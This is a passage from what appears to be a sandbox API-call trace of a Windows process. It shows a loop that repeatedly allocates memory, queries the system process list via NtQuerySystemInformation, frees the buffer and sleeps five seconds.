RegionSize=0xdea68*=0x10000) returned 0x0 [0276.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.209] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.219] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.228] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.236] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.244] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.253] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.261] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.270] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.278] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.279] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.288] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.296] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.306] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.318] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.339] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.343] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.349] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.352] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.358] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.358] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.371] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.377] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.387] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.396] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 